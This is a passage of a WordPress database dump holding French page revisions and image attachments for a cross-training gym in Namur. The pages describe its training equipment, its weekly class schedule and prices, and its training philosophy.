(71, 1, '2013-06-16 11:10:48', '2013-06-16 11:10:48', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:10:48', '2013-06-16 11:10:48', '', 22, 'http://www.crosstrainingcenter.be/?p=71', 0, 'revision', '', 0),
(72, 1, '2013-06-16 11:19:12', '2013-06-16 11:19:12', '', 'vipr-f1', '', 'inherit', 'open', 'open', '', 'vipr-f1', '', '', '2013-06-16 11:19:12', '2013-06-16 11:19:12', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg', 0, 'attachment', 'image/jpeg', 0),
(73, 1, '2013-06-16 11:14:12', '2013-06-16 11:14:12', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:14:12', '2013-06-16 11:14:12', '', 22, 'http://www.crosstrainingcenter.be/?p=73', 0, 'revision', '', 0),
(74, 1, '2013-06-16 11:19:30', '2013-06-16 11:19:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:19:30', '2013-06-16 11:19:30', '', 22, 'http://www.crosstrainingcenter.be/?p=74', 0, 'revision', '', 0),
(75, 1, '2013-06-16 11:22:29', '2013-06-16 11:22:29', '', 'ript', '', 'inherit', 'open', 'open', '', 'ript', '', '', '2013-06-16 11:22:29', '2013-06-16 11:22:29', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg', 0, 'attachment', 'image/jpeg', 0),
(76, 1, '2013-06-16 11:22:21', '2013-06-16 11:22:21', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:22:21', '2013-06-16 11:22:21', '', 22, 'http://www.crosstrainingcenter.be/?p=76', 0, 'revision', '', 0),
(284, 1, '2013-07-04 16:29:04', '2013-07-04 16:29:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 16:29:04', '2013-07-04 16:29:04', '', 11, 'http://www.crosstrainingcenter.be/?p=284', 0, 'revision', '', 0),
(104, 1, '2013-06-16 13:47:09', '2013-06-16 13:47:09', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-98 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:47:09', '2013-06-16 13:47:09', '', 5, 'http://www.crosstrainingcenter.be/?p=104', 0, 'revision', '', 0),
(77, 1, '2013-06-16 10:26:16', '2013-06-16 10:26:16', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-52 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement.\r\n\r\n&nbsp;\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 